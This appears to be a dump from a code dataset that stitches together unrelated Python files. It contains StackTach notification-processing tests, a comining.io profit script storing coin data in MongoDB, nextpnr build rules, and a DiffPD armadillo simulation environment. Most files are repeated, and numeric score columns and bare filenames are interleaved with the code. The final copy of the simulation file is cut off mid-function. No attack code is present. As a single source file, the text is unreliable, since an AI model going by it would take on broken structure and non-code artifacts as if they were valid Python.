self.assertEquals(usage.rax_options, RAX_OPTIONS_1)
self.mox.VerifyAll()
def test_process_usage_for_updates_finish_resize_start(self):
notification = self._create_mock_notification()
raw = self.mox.CreateMockAnything()
raw.event = 'compute.instance.finish_resize.start'
usage = self.mox.CreateMockAnything()
usage.launched_at = None
usage.instance_type_id = INSTANCE_TYPE_ID_2
usage.instance_flavor_id = INSTANCE_FLAVOR_ID_2
views.STACKDB.get_or_create_instance_usage(instance=INSTANCE_ID_1,
request_id=REQUEST_ID_1) \
.AndReturn((usage, True))
views.STACKDB.save(usage)
self.mox.ReplayAll()
views._process_usage_for_updates(raw, notification)
self.assertEqual(usage.instance_type_id, INSTANCE_TYPE_ID_1)
self.assertEqual(usage.instance_flavor_id, INSTANCE_FLAVOR_ID_1)
self.assertEquals(usage.tenant, TENANT_ID_1)
self.assertEquals(usage.os_architecture, OS_ARCH_1)
self.assertEquals(usage.os_version, OS_VERSION_1)
self.assertEquals(usage.os_distro, OS_DISTRO_1)
self.assertEquals(usage.rax_options, RAX_OPTIONS_1)
self.mox.VerifyAll()
def test_process_usage_for_updates_finish_resize_end(self):
notification = self._create_mock_notification()
raw = self.mox.CreateMockAnything()
raw.event = 'compute.instance.finish_resize.end'
usage = self.mox.CreateMockAnything()
usage.launched_at = None
usage.instance_type_id = INSTANCE_TYPE_ID_2
usage.instance_flavor_id = INSTANCE_FLAVOR_ID_2
views.STACKDB.get_or_create_instance_usage(instance=INSTANCE_ID_1,
request_id=REQUEST_ID_1) \
.AndReturn((usage, True))
views.STACKDB.save(usage)
self.mox.ReplayAll()
views._process_usage_for_updates(raw, notification)
self.assertEqual(usage.instance_type_id, INSTANCE_TYPE_ID_1)
self.assertEqual(usage.instance_flavor_id, INSTANCE_FLAVOR_ID_1)
self.assertEquals(usage.tenant, TENANT_ID_1)
self.assertEquals(usage.os_architecture, OS_ARCH_1)
self.assertEquals(usage.os_version, OS_VERSION_1)
self.assertEquals(usage.os_distro, OS_DISTRO_1)
self.assertEquals(usage.rax_options, RAX_OPTIONS_1)
self.mox.VerifyAll()
def test_process_delete(self):
delete_time = datetime.datetime.utcnow()
terminated_time = delete_time-datetime.timedelta(seconds=1)
launch_time = delete_time-datetime.timedelta(days=1)
launch_decimal = utils.decimal_utc(launch_time)
delete_decimal = utils.decimal_utc(delete_time)
notification = self.mox.CreateMockAnything()
notification.instance = INSTANCE_ID_1
notification.deleted_at = str(delete_time)
notification.terminated_at = str(terminated_time)
notification.launched_at = str(launch_time)
raw = self.mox.CreateMockAnything()
delete = self.mox.CreateMockAnything()
delete.instance = INSTANCE_ID_1
delete.launched_at = launch_decimal
delete.deleted_at = delete_decimal
views.STACKDB.get_or_create_instance_delete(
instance=INSTANCE_ID_1, deleted_at=delete_decimal,
launched_at=launch_decimal)\
.AndReturn((delete, True))
views.STACKDB.save(delete)
self.mox.ReplayAll()
views._process_delete(raw, notification)
self.assertEqual(delete.instance, INSTANCE_ID_1)
self.assertEqual(delete.launched_at, launch_decimal)
self.assertEqual(delete.deleted_at, delete_decimal)
self.mox.VerifyAll()
def test_process_delete_with_only_terminated_at(self):
delete_time = datetime.datetime.utcnow()
launch_time = delete_time-datetime.timedelta(days=1)
launch_decimal = utils.decimal_utc(launch_time)
delete_decimal = utils.decimal_utc(delete_time)
notification = self.mox.CreateMockAnything()
notification.instance = INSTANCE_ID_1
notification.deleted_at = ''
notification.terminated_at = str(delete_time)
notification.launched_at = str(launch_time)
raw = self.mox.CreateMockAnything()
delete = self.mox.CreateMockAnything()
delete.instance = INSTANCE_ID_1
delete.launched_at = launch_decimal
delete.deleted_at = delete_decimal
views.STACKDB.get_or_create_instance_delete(
instance=INSTANCE_ID_1, deleted_at=delete_decimal,
launched_at=launch_decimal)\
.AndReturn((delete, True))
views.STACKDB.save(delete)
self.mox.ReplayAll()
views._process_delete(raw, notification)
self.assertEqual(delete.instance, INSTANCE_ID_1)
self.assertEqual(delete.launched_at, launch_decimal)
self.assertEqual(delete.deleted_at, delete_decimal)
self.mox.VerifyAll()
def test_process_delete_with_neither(self):
delete_time = datetime.datetime.utcnow()
launch_time = delete_time-datetime.timedelta(days=1)
launch_decimal = utils.decimal_utc(launch_time)
delete_decimal = utils.decimal_utc(delete_time)
notification = self.mox.CreateMockAnything()
notification.instance = INSTANCE_ID_1
notification.deleted_at = ''
notification.terminated_at = str(delete_time)
notification.launched_at = str(launch_time)
raw = self.mox.CreateMockAnything()
delete = self.mox.CreateMockAnything()
delete.instance = INSTANCE_ID_1
delete.launched_at = launch_decimal
delete.deleted_at = delete_decimal
views.STACKDB.get_or_create_instance_delete(
instance=INSTANCE_ID_1, deleted_at=delete_decimal,
launched_at=launch_decimal)\
.AndReturn((delete, True))
views.STACKDB.save(delete)
self.mox.ReplayAll()
views._process_delete(raw, notification)
self.assertEqual(delete.instance, INSTANCE_ID_1)
self.assertEqual(delete.launched_at, launch_decimal)
self.assertEqual(delete.deleted_at, delete_decimal)
self.mox.VerifyAll()
def test_process_delete_no_launch(self):
delete_time = datetime.datetime.utcnow()
notification = self.mox.CreateMockAnything()
notification.instance = INSTANCE_ID_1
notification.deleted_at = str(delete_time)
notification.launched_at = ''
raw = self.mox.CreateMockAnything()
self.mox.ReplayAll()
views._process_delete(raw, notification)
self.mox.VerifyAll()
def _create_exists_notification(self, audit_beginning, current_time,
launch_time, deleted_time):
notification = self.mox.CreateMockAnything()
notification.launched_at = str(launch_time)
notification.deleted_at = str(deleted_time)
notification.audit_period_beginning = str(audit_beginning)
notification.audit_period_ending = str(current_time)
notification.tenant = TENANT_ID_1
notification.os_architecture = OS_ARCH_1
notification.os_version = OS_VERSION_1
notification.os_distro = OS_DISTRO_1
notification.rax_options = RAX_OPTIONS_1
notification.instance = INSTANCE_ID_1
notification.instance_type_id = INSTANCE_TYPE_ID_1
notification.instance_flavor_id = INSTANCE_FLAVOR_ID_1
notification.message_id = MESSAGE_ID_1
notification.bandwidth_public_out = BANDWIDTH_PUBLIC_OUTBOUND
return notification
def test_process_exists(self):
current_time = datetime.datetime.utcnow()
launch_time = current_time - datetime.timedelta(hours=23)
launch_decimal = utils.decimal_utc(launch_time)
audit_beginning = current_time - datetime.timedelta(hours=20)
audit_beginning_decimal = utils.decimal_utc(audit_beginning)
audit_ending_decimal = utils.decimal_utc(current_time)
notification = self._create_exists_notification(
audit_beginning, current_time, launch_time, deleted_time='')
raw = self.mox.CreateMockAnything()
usage = self.mox.CreateMockAnything()
launched_range = (launch_decimal, launch_decimal+1)
views.STACKDB.get_instance_usage(
instance=INSTANCE_ID_1,
launched_at__range=launched_range).AndReturn(usage)
exists_values = {
'message_id': MESSAGE_ID_1,
'instance': INSTANCE_ID_1,
'launched_at': launch_decimal,
'audit_period_beginning': audit_beginning_decimal,
'audit_period_ending': audit_ending_decimal,
'instance_type_id': INSTANCE_TYPE_ID_1,
'instance_flavor_id': INSTANCE_FLAVOR_ID_1,
'usage': usage,
'raw': raw,
'tenant': TENANT_ID_1,
'rax_options': RAX_OPTIONS_1,
'os_architecture': OS_ARCH_1,
'os_version': OS_VERSION_1,
'os_distro': OS_DISTRO_1,
'bandwidth_public_out': BANDWIDTH_PUBLIC_OUTBOUND
}
exists = self.mox.CreateMockAnything()
views.STACKDB.create_instance_exists(**exists_values).AndReturn(exists)
views.STACKDB.save(exists)
self.mox.ReplayAll()
views._process_exists(raw, notification)
self.mox.VerifyAll()
def test_process_exists_no_launched_at(self):
notification = self.mox.CreateMockAnything()
notification.instance = INSTANCE_ID_1
notification.launched_at = None
raw = self.mox.CreateMockAnything()
raw.id = '1'
self.setup_mock_log()
self.log.warn('Ignoring exists without launched_at. RawData(1)')
self.mox.ReplayAll()
views._process_exists(raw, notification)
self.mox.VerifyAll()
def test_process_exists_with_deleted_at(self):
current_time = datetime.datetime.utcnow()
launch_time = current_time - datetime.timedelta(hours=23)
launch_decimal = utils.decimal_utc(launch_time)
delete_time = datetime.datetime.utcnow()
deleted_decimal = utils.decimal_utc(delete_time)
audit_beginning = current_time - datetime.timedelta(hours=20)
audit_beginning_decimal = utils.decimal_utc(audit_beginning)
audit_ending_decimal = utils.decimal_utc(current_time)
notification = self._create_exists_notification(
audit_beginning, current_time, launch_time, delete_time)
raw = self.mox.CreateMockAnything()
usage = self.mox.CreateMockAnything()
launched_range = (launch_decimal, launch_decimal+1)
views.STACKDB.get_instance_usage(instance=INSTANCE_ID_1,
launched_at__range=launched_range)\
.AndReturn(usage)
delete = self.mox.CreateMockAnything()
views.STACKDB.get_instance_delete(instance=INSTANCE_ID_1,
launched_at__range=launched_range)\
.AndReturn(delete)
exists_values = {
'message_id': MESSAGE_ID_1,
'instance': INSTANCE_ID_1,
'launched_at': launch_decimal,
'deleted_at': deleted_decimal,
'audit_period_beginning': audit_beginning_decimal,
'audit_period_ending': audit_ending_decimal,
'instance_type_id': INSTANCE_TYPE_ID_1,
'instance_flavor_id': INSTANCE_FLAVOR_ID_1,
'usage': usage,
'delete': delete,
'raw': raw,
'tenant': TENANT_ID_1,
'rax_options': RAX_OPTIONS_1,
'os_architecture': OS_ARCH_1,
'os_version': OS_VERSION_1,
'os_distro': OS_DISTRO_1,
'bandwidth_public_out': BANDWIDTH_PUBLIC_OUTBOUND
}
exists = self.mox.CreateMockAnything()
views.STACKDB.create_instance_exists(**exists_values).AndReturn(exists)
views.STACKDB.save(exists)
self.mox.ReplayAll()
views._process_exists(raw, notification)
self.mox.VerifyAll()
class StacktachImageUsageParsingTestCase(StacktachBaseTestCase):
def setUp(self):
self.mox = mox.Mox()
views.STACKDB = self.mox.CreateMockAnything()
def tearDown(self):
self.mox.UnsetStubs()
def test_save_image_usage(self):
raw = self.mox.CreateMockAnything()
notification = self.mox.CreateMockAnything()
notification.save_usage(raw)
self.mox.ReplayAll()
views._process_glance_usage(raw, notification)
self.mox.VerifyAll()
def test_save_image_delete(self):
raw = self.mox.CreateMockAnything()
notification = self.mox.CreateMockAnything()
notification.save_delete(raw)
self.mox.ReplayAll()
views._process_glance_delete(raw, notification)
self.mox.VerifyAll()
def test_save_image_exists(self):
raw = self.mox.CreateMockAnything()
notification = self.mox.CreateMockAnything()
notification.save_exists(raw)
self.mox.ReplayAll()
views._process_glance_exists(raw, notification)
self.mox.VerifyAll() | 0.510008 | 0.126758 |
COMINING_URL = "https://api.comining.io/?key="
COMINING_KEY = "Your-Comining-Key"
import pymongo
import requests
from datetime import datetime
import time
coinslist = {"method":"coins_list"} #coins list and their profit
coinsreward = {"method":"coins_reward"} #coins reward your acount
blocklist = {"method":"blocks_list"}
mininglist = {"method":"mining_list"}
workershash = {"method":"workers_hashrate"}
workerslist = {"method":"workers_list"}
workers = {"method":"workers_summary"}
headers = {'charset': 'utf-8'}
def RESP(opt): #Post запрос к серверу
response = requests.post(COMINING_URL + COMINING_KEY, json=opt, headers=headers)
return response.json()
cnslst = RESP(coinslist)
cnslst = list(cnslst.get('data'))
cnslst = cnslst
conn = pymongo.MongoClient("192.168.1.66", 27017)
db = conn['comining']
blockcoin = db['blockcoin']
pref = db['pref']
coins = db['coins']
for i in range(len(cnslst)):
profit = cnslst[i].get('profit')
revusd = profit.get('revenue_usd') / 10
revusd = float('{:.2f}'.format(revusd))
revcns = profit.get('coins') / 10
revcns = float('{:.3f}'.format(revcns))
cns = {'coin': cnslst[i].get('coin'), 'baseReward': cnslst[i].get('baseReward'),'active': cnslst[i].get('active'), 'coinIconUrl': cnslst[i].get('coinIconUrl'), 'blockTime': cnslst[i].get('blockTime'), 'blockRevenueUsd': cnslst[i].get('blockRevenueUsd'), 'networkDifficulty': cnslst[i].get('networkDifficulty'), 'networkHashrate': cnslst[i].get('networkHashrate'), 'siteUrl': cnslst[i].get('siteUrl'), 'workersHashrate': cnslst[i].get('workersHashrate'), 'revenue_usd': revusd, 'revenue_coins': revcns}
coins.update({'coin': cnslst[i].get('coin')},{'coin': cnslst[i].get('coin'), 'baseReward': cnslst[i].get('baseReward'),'active': cnslst[i].get('active'), 'coinIconUrl': cnslst[i].get('coinIconUrl'), 'blockTime': cnslst[i].get('blockTime'), 'blockRevenueUsd': cnslst[i].get('blockRevenueUsd'), 'networkDifficulty': cnslst[i].get('networkDifficulty'), 'networkHashrate': cnslst[i].get('networkHashrate'), 'siteUrl': cnslst[i].get('siteUrl'), 'workersHashrate': cnslst[i].get('workersHashrate'), 'revenue_usd': revusd, 'revenue_coins': revcns})
if cnslst[i].get('active') == True:
cnt = revcns / float(cnslst[i].get('baseReward'))
cnt = float('{:.2f}'.format(cnt))
if cnt >= 100:
cnt = 10
elif cnt >= 50:
cnt = 6
elif cnt >= 40:
cnt = 5
elif cnt >= 30:
cnt = 4
elif cnt >= 20:
cnt = 3
elif cnt >= 10:
cnt = 2
elif cnt >= 1:
cnt = 1
elif cnt < 1:
cnt = 0
pref.update({'coin': cnslst[i].get('coin')}, {'coin': cnslst[i].get('coin'), 'count': cnt, 'coincounter': 'conter coin'}) | comining-profit.py | COMINING_URL = "https://api.comining.io/?key="
COMINING_KEY = "Your-Comining-Key"
import pymongo
import requests
from datetime import datetime
import time
coinslist = {"method":"coins_list"} #coins list and their profit
coinsreward = {"method":"coins_reward"} #coins reward your acount
blocklist = {"method":"blocks_list"}
mininglist = {"method":"mining_list"}
workershash = {"method":"workers_hashrate"}
workerslist = {"method":"workers_list"}
workers = {"method":"workers_summary"}
headers = {'charset': 'utf-8'}
def RESP(opt): #Post запрос к серверу
response = requests.post(COMINING_URL + COMINING_KEY, json=opt, headers=headers)
return response.json()
cnslst = RESP(coinslist)
cnslst = list(cnslst.get('data'))
cnslst = cnslst
conn = pymongo.MongoClient("192.168.1.66", 27017)
db = conn['comining']
blockcoin = db['blockcoin']
pref = db['pref']
coins = db['coins']
for i in range(len(cnslst)):
profit = cnslst[i].get('profit')
revusd = profit.get('revenue_usd') / 10
revusd = float('{:.2f}'.format(revusd))
revcns = profit.get('coins') / 10
revcns = float('{:.3f}'.format(revcns))
cns = {'coin': cnslst[i].get('coin'), 'baseReward': cnslst[i].get('baseReward'),'active': cnslst[i].get('active'), 'coinIconUrl': cnslst[i].get('coinIconUrl'), 'blockTime': cnslst[i].get('blockTime'), 'blockRevenueUsd': cnslst[i].get('blockRevenueUsd'), 'networkDifficulty': cnslst[i].get('networkDifficulty'), 'networkHashrate': cnslst[i].get('networkHashrate'), 'siteUrl': cnslst[i].get('siteUrl'), 'workersHashrate': cnslst[i].get('workersHashrate'), 'revenue_usd': revusd, 'revenue_coins': revcns}
coins.update({'coin': cnslst[i].get('coin')},{'coin': cnslst[i].get('coin'), 'baseReward': cnslst[i].get('baseReward'),'active': cnslst[i].get('active'), 'coinIconUrl': cnslst[i].get('coinIconUrl'), 'blockTime': cnslst[i].get('blockTime'), 'blockRevenueUsd': cnslst[i].get('blockRevenueUsd'), 'networkDifficulty': cnslst[i].get('networkDifficulty'), 'networkHashrate': cnslst[i].get('networkHashrate'), 'siteUrl': cnslst[i].get('siteUrl'), 'workersHashrate': cnslst[i].get('workersHashrate'), 'revenue_usd': revusd, 'revenue_coins': revcns})
if cnslst[i].get('active') == True:
cnt = revcns / float(cnslst[i].get('baseReward'))
cnt = float('{:.2f}'.format(cnt))
if cnt >= 100:
cnt = 10
elif cnt >= 50:
cnt = 6
elif cnt >= 40:
cnt = 5
elif cnt >= 30:
cnt = 4
elif cnt >= 20:
cnt = 3
elif cnt >= 10:
cnt = 2
elif cnt >= 1:
cnt = 1
elif cnt < 1:
cnt = 0
pref.update({'coin': cnslst[i].get('coin')}, {'coin': cnslst[i].get('coin'), 'count': cnt, 'coincounter': 'conter coin'}) | 0.27406 | 0.074299 |
from src.base import SourceLocation, Target
# main
SourceLocation(
name = 'nextpnr',
vcs = 'git',
location = 'https://github.com/YosysHQ/nextpnr',
revision = 'origin/master',
)
Target(
name = 'nextpnr-bba',
sources = [ 'nextpnr' ],
build_native = True,
gitrev = [ ('nextpnr', 'bba') ],
)
Target(
name = 'nextpnr-generic',
sources = [ 'nextpnr' ],
dependencies = [ 'python3', 'nextpnr-bba'],
resources = [ 'python3' ],
license_file = 'nextpnr/COPYING',
)
Target(
name = 'nextpnr-ice40',
sources = [ 'nextpnr' ],
dependencies = [ 'python3', 'nextpnr-bba', 'icestorm-bba'],
resources = [ 'python3' ],
license_file = 'nextpnr/COPYING',
package = 'ice40',
)
Target(
name = 'nextpnr-ecp5',
sources = [ 'nextpnr' ],
dependencies = [ 'python3', 'nextpnr-bba', 'prjtrellis-bba'],
resources = [ 'python3' ],
license_file = 'nextpnr/COPYING',
package = 'ecp5',
)
Target(
name = 'nextpnr-machxo2',
sources = [ 'nextpnr' ],
dependencies = [ 'python3', 'nextpnr-bba', 'prjtrellis-bba'],
resources = [ 'python3' ],
license_file = 'nextpnr/COPYING',
package = 'ecp5', # using same prjtrellis base
)
Target(
name = 'nextpnr-nexus',
sources = [ 'nextpnr' ],
dependencies = [ 'python3', 'nextpnr-bba', 'prjoxide-bba' ],
resources = [ 'python3' ],
license_file = 'nextpnr/COPYING',
package = 'nexus',
)
Target(
name = 'nextpnr-mistral',
sources = [ 'nextpnr', 'mistral' ],
dependencies = [ 'python3', 'nextpnr-bba' ],
resources = [ 'python3' ],
license_file = 'nextpnr/COPYING',
)
# architecture specific
SourceLocation(
name = 'icestorm',
vcs = 'git',
location = 'https://github.com/YosysHQ/icestorm',
revision = 'origin/master',
)
SourceLocation(
name = 'prjtrellis',
vcs = 'git',
location = 'https://github.com/YosysHQ/prjtrellis',
revision = 'origin/master',
)
SourceLocation(
name = 'prjoxide',
vcs = 'git',
location = 'https://github.com/gatecat/prjoxide',
revision = 'origin/master',
)
SourceLocation(
name = 'mistral',
vcs = 'git',
location = 'https://github.com/Ravenslofty/mistral',
revision = 'origin/master',
)
Target(
name = 'icestorm',
sources = [ 'icestorm' ],
license_file = 'icestorm/COPYING',
package = 'ice40',
)
Target(
name = 'prjtrellis',
sources = [ 'prjtrellis' ],
license_file = 'prjtrellis/COPYING',
package = 'ecp5',
)
Target(
name = 'prjoxide',
sources = [ 'prjoxide' ],
license_file = 'prjoxide/COPYING',
package = 'nexus',
)
# chip databases
Target(
name = 'icestorm-bba',
sources = [ 'nextpnr' ],
dependencies = [ 'icestorm' ],
gitrev = [ ('nextpnr', 'ice40') ],
build_native = True,
)
Target(
name = 'prjtrellis-bba',
sources = [ 'prjtrellis', 'nextpnr' ],
gitrev = [ ('nextpnr', 'ecp5'), ('nextpnr', 'machxo2') ],
build_native = True,
)
Target(
name = 'prjoxide-bba',
sources = [ 'nextpnr' ],
dependencies = [ 'prjoxide' ],
gitrev = [ ('nextpnr', 'nexus') ],
build_native = True,
) | default/rules/nextpnr.py | from src.base import SourceLocation, Target
# main
SourceLocation(
name = 'nextpnr',
vcs = 'git',
location = 'https://github.com/YosysHQ/nextpnr',
revision = 'origin/master',
)
Target(
name = 'nextpnr-bba',
sources = [ 'nextpnr' ],
build_native = True,
gitrev = [ ('nextpnr', 'bba') ],
)
Target(
name = 'nextpnr-generic',
sources = [ 'nextpnr' ],
dependencies = [ 'python3', 'nextpnr-bba'],
resources = [ 'python3' ],
license_file = 'nextpnr/COPYING',
)
Target(
name = 'nextpnr-ice40',
sources = [ 'nextpnr' ],
dependencies = [ 'python3', 'nextpnr-bba', 'icestorm-bba'],
resources = [ 'python3' ],
license_file = 'nextpnr/COPYING',
package = 'ice40',
)
Target(
name = 'nextpnr-ecp5',
sources = [ 'nextpnr' ],
dependencies = [ 'python3', 'nextpnr-bba', 'prjtrellis-bba'],
resources = [ 'python3' ],
license_file = 'nextpnr/COPYING',
package = 'ecp5',
)
Target(
name = 'nextpnr-machxo2',
sources = [ 'nextpnr' ],
dependencies = [ 'python3', 'nextpnr-bba', 'prjtrellis-bba'],
resources = [ 'python3' ],
license_file = 'nextpnr/COPYING',
package = 'ecp5', # using same prjtrellis base
)
Target(
name = 'nextpnr-nexus',
sources = [ 'nextpnr' ],
dependencies = [ 'python3', 'nextpnr-bba', 'prjoxide-bba' ],
resources = [ 'python3' ],
license_file = 'nextpnr/COPYING',
package = 'nexus',
)
Target(
name = 'nextpnr-mistral',
sources = [ 'nextpnr', 'mistral' ],
dependencies = [ 'python3', 'nextpnr-bba' ],
resources = [ 'python3' ],
license_file = 'nextpnr/COPYING',
)
# architecture specific
SourceLocation(
name = 'icestorm',
vcs = 'git',
location = 'https://github.com/YosysHQ/icestorm',
revision = 'origin/master',
)
SourceLocation(
name = 'prjtrellis',
vcs = 'git',
location = 'https://github.com/YosysHQ/prjtrellis',
revision = 'origin/master',
)
SourceLocation(
name = 'prjoxide',
vcs = 'git',
location = 'https://github.com/gatecat/prjoxide',
revision = 'origin/master',
)
SourceLocation(
name = 'mistral',
vcs = 'git',
location = 'https://github.com/Ravenslofty/mistral',
revision = 'origin/master',
)
Target(
name = 'icestorm',
sources = [ 'icestorm' ],
license_file = 'icestorm/COPYING',
package = 'ice40',
)
Target(
name = 'prjtrellis',
sources = [ 'prjtrellis' ],
license_file = 'prjtrellis/COPYING',
package = 'ecp5',
)
Target(
name = 'prjoxide',
sources = [ 'prjoxide' ],
license_file = 'prjoxide/COPYING',
package = 'nexus',
)
# chip databases
Target(
name = 'icestorm-bba',
sources = [ 'nextpnr' ],
dependencies = [ 'icestorm' ],
gitrev = [ ('nextpnr', 'ice40') ],
build_native = True,
)
Target(
name = 'prjtrellis-bba',
sources = [ 'prjtrellis', 'nextpnr' ],
gitrev = [ ('nextpnr', 'ecp5'), ('nextpnr', 'machxo2') ],
build_native = True,
)
Target(
name = 'prjoxide-bba',
sources = [ 'nextpnr' ],
dependencies = [ 'prjoxide' ],
gitrev = [ ('nextpnr', 'nexus') ],
build_native = True,
) | 0.25128 | 0.188978 |
import time
from pathlib import Path
import numpy as np
import os
from py_diff_pd.env.env_base import EnvBase
from py_diff_pd.common.tet_mesh import tetrahedralize
from py_diff_pd.common.project_path import root_path
from py_diff_pd.common.common import print_info, create_folder, ndarray
from py_diff_pd.common.display import export_mp4
from py_diff_pd.common.tet_mesh import generate_tet_mesh, read_tetgen_file
from py_diff_pd.common.tet_mesh import get_contact_vertex as get_tet_contact_vertex
from py_diff_pd.core.py_diff_pd_core import TetMesh3d, TetDeformable
from py_diff_pd.common.renderer import PbrtRenderer
from py_diff_pd.common.project_path import root_path
class ArmadilloEnv3d(EnvBase):
def __init__(self, seed, folder, options):
EnvBase.__init__(self, folder)
np.random.seed(seed)
create_folder(folder, exist_ok=True)
youngs_modulus = options['youngs_modulus'] if 'youngs_modulus' in options else 1e6
poissons_ratio = options['poissons_ratio'] if 'poissons_ratio' in options else 0.45
state_force_parameters = options['state_force_parameters'] if 'state_force_parameters' in options else ndarray([0.0, 0.0, -9.81])
# Mesh parameters.
la = youngs_modulus * poissons_ratio / ((1 + poissons_ratio) * (1 - 2 * poissons_ratio))
mu = youngs_modulus / (2 * (1 + poissons_ratio))
density = 1e3
# Generate armadillo mesh.
ele_file_name = Path(root_path) / 'asset' / 'mesh' / 'armadillo_10k.ele'
node_file_name = Path(root_path) / 'asset' / 'mesh' / 'armadillo_10k.node'
verts, eles = read_tetgen_file(node_file_name, ele_file_name)
# To make the mesh consistent with our coordinate system, we need to:
# - rotate the model along +x by 90 degrees.
# - shift it so that its min_z = 0.
# - divide it by 1000.
R = ndarray([
[1, 0, 0],
[0, 0, -1],
[0, 1, 0]
])
verts = verts @ R.T
# Next, rotate along z by 180 degrees.
R = ndarray([
[-1, 0, 0],
[0, -1, 0],
[0, 0, 1],
])
verts = verts @ R.T
min_z = np.min(verts, axis=0)[2]
verts[:, 2] -= min_z
verts /= 1000
tmp_bin_file_name = '.tmp.bin'
generate_tet_mesh(verts, eles, tmp_bin_file_name)
mesh = TetMesh3d()
mesh.Initialize(str(tmp_bin_file_name))
deformable = TetDeformable()
deformable.Initialize(tmp_bin_file_name, density, 'neohookean', youngs_modulus, poissons_ratio)
os.remove(tmp_bin_file_name)
# Boundary conditions.
# Figure out the lowest z nodes.
vert_num = mesh.NumOfVertices()
all_verts = ndarray([ndarray(mesh.py_vertex(i)) for i in range(vert_num)])
max_corner = np.max(all_verts, axis=0)
min_corner = np.min(all_verts, axis=0)
center = (max_corner + min_corner) / 2
min_z = min_corner[2]
max_z = max_corner[2]
min_x = min_corner[0]
max_x = max_corner[0]
dirichlet_dofs = []
self.__min_x_nodes = []
self.__max_x_nodes = []
for i in range(vert_num):
vx, vy, vz = all_verts[i]
if vx - min_x < 1e-3:
self.__min_x_nodes.append(i)
if max_x - vx < 1e-3:
self.__max_x_nodes.append(i)
if vz - min_z < 1e-3:
deformable.SetDirichletBoundaryCondition(3 * i, vx)
deformable.SetDirichletBoundaryCondition(3 * i + 1, vy)
deformable.SetDirichletBoundaryCondition(3 * i + 2, vz)
dirichlet_dofs += [3 * i, 3 * i + 1, 3 * i + 2]
if max_z - vz < 1e-3:
deformable.SetDirichletBoundaryCondition(3 * i + 2, vz)
dirichlet_dofs += [3 * i + 2,]
self.__dirichlet_dofs = dirichlet_dofs
# State-based forces.
deformable.AddStateForce('gravity', state_force_parameters)
# Initial state by rotating the armadillo.
q0 = np.copy(all_verts)
theta = float(options['init_rotate_angle'])
for i in range(vert_num):
vi = all_verts[i]
th = (vi[2] - min_z) / (max_corner[2] - min_z) * theta
c, s = np.cos(th), np.sin(th)
R = ndarray([[c, -s, 0],
[s, c, 0],
[0, 0, 1]])
q0[i] = R @ (vi - center) + center
dofs = deformable.dofs()
act_dofs = deformable.act_dofs()
q0 = q0.ravel()
v0 = ndarray(np.zeros(dofs)).ravel()
f_ext = ndarray(np.zeros(dofs)).ravel()
# Data members.
self._deformable = deformable
self._q0 = q0
self._v0 = v0
self._f_ext = f_ext
self._youngs_modulus = youngs_modulus
self._poissons_ratio = poissons_ratio
self._state_force_parameters = state_force_parameters
self._stepwise_loss = False
self.__loss_q_grad = np.random.normal(size=dofs)
self.__loss_v_grad = np.random.normal(size=dofs)
self.__spp = options['spp'] if 'spp' in options else 4
def material_stiffness_differential(self, youngs_modulus, poissons_ratio):
# This (0, 2) shape is due to the usage of Neohookean materials.
return np.zeros((0, 2))
def is_dirichlet_dof(self, dof):
return dof in self.__dirichlet_dofs
def _display_mesh(self, mesh_file, file_name):
# Size of the bounding box: [-0.06, -0.05, 0] - [0.06, 0.05, 0.14]
options = {
'file_name': file_name,
'light_map': 'uffizi-large.exr',
'sample': self.__spp,
'max_depth': 2,
'camera_pos': (0.12, -0.8, 0.34),
'camera_lookat': (0, 0, .15)
}
renderer = PbrtRenderer(options)
mesh = TetMesh3d()
mesh.Initialize(mesh_file)
vert_num = mesh.NumOfVertices()
all_verts = ndarray([ndarray(mesh.py_vertex(i)) for i in range(vert_num)])
renderer.add_tri_mesh(mesh, color='0096c7',
transforms=[('s', 2)],
render_tet_edge=True,
)
renderer.add_tri_mesh(Path(root_path) / 'asset/mesh/curved_ground.obj',
texture_img='chkbd_24_0.7', transforms=[('s', 2)])
renderer.render()
def min_x_nodes(self):
return self.__min_x_nodes
def max_x_nodes(self):
return self.__max_x_nodes
def _loss_and_grad(self, q, v):
loss = q.dot(self.__loss_q_grad) + v.dot(self.__loss_v_grad)
return loss, np.copy(self.__loss_q_grad), np.copy(self.__loss_v_grad) | python/py_diff_pd/env/armadillo_env_3d.py | import time
from pathlib import Path
import numpy as np
import os
from py_diff_pd.env.env_base import EnvBase
from py_diff_pd.common.tet_mesh import tetrahedralize
from py_diff_pd.common.project_path import root_path
from py_diff_pd.common.common import print_info, create_folder, ndarray
from py_diff_pd.common.display import export_mp4
from py_diff_pd.common.tet_mesh import generate_tet_mesh, read_tetgen_file
from py_diff_pd.common.tet_mesh import get_contact_vertex as get_tet_contact_vertex
from py_diff_pd.core.py_diff_pd_core import TetMesh3d, TetDeformable
from py_diff_pd.common.renderer import PbrtRenderer
from py_diff_pd.common.project_path import root_path
class ArmadilloEnv3d(EnvBase):
def __init__(self, seed, folder, options):
EnvBase.__init__(self, folder)
np.random.seed(seed)
create_folder(folder, exist_ok=True)
youngs_modulus = options['youngs_modulus'] if 'youngs_modulus' in options else 1e6
poissons_ratio = options['poissons_ratio'] if 'poissons_ratio' in options else 0.45
state_force_parameters = options['state_force_parameters'] if 'state_force_parameters' in options else ndarray([0.0, 0.0, -9.81])
# Mesh parameters.
la = youngs_modulus * poissons_ratio / ((1 + poissons_ratio) * (1 - 2 * poissons_ratio))
mu = youngs_modulus / (2 * (1 + poissons_ratio))
density = 1e3
# Generate armadillo mesh.
ele_file_name = Path(root_path) / 'asset' / 'mesh' / 'armadillo_10k.ele'
node_file_name = Path(root_path) / 'asset' / 'mesh' / 'armadillo_10k.node'
verts, eles = read_tetgen_file(node_file_name, ele_file_name)
# To make the mesh consistent with our coordinate system, we need to:
# - rotate the model along +x by 90 degrees.
# - shift it so that its min_z = 0.
# - divide it by 1000.
R = ndarray([
[1, 0, 0],
[0, 0, -1],
[0, 1, 0]
])
verts = verts @ R.T
# Next, rotate along z by 180 degrees.
R = ndarray([
[-1, 0, 0],
[0, -1, 0],
[0, 0, 1],
])
verts = verts @ R.T
min_z = np.min(verts, axis=0)[2]
verts[:, 2] -= min_z
verts /= 1000
tmp_bin_file_name = '.tmp.bin'
generate_tet_mesh(verts, eles, tmp_bin_file_name)
mesh = TetMesh3d()
mesh.Initialize(str(tmp_bin_file_name))
deformable = TetDeformable()
deformable.Initialize(tmp_bin_file_name, density, 'neohookean', youngs_modulus, poissons_ratio)
os.remove(tmp_bin_file_name)
# Boundary conditions.
# Figure out the lowest z nodes.
vert_num = mesh.NumOfVertices()
all_verts = ndarray([ndarray(mesh.py_vertex(i)) for i in range(vert_num)])
max_corner = np.max(all_verts, axis=0)
min_corner = np.min(all_verts, axis=0)
center = (max_corner + min_corner) / 2
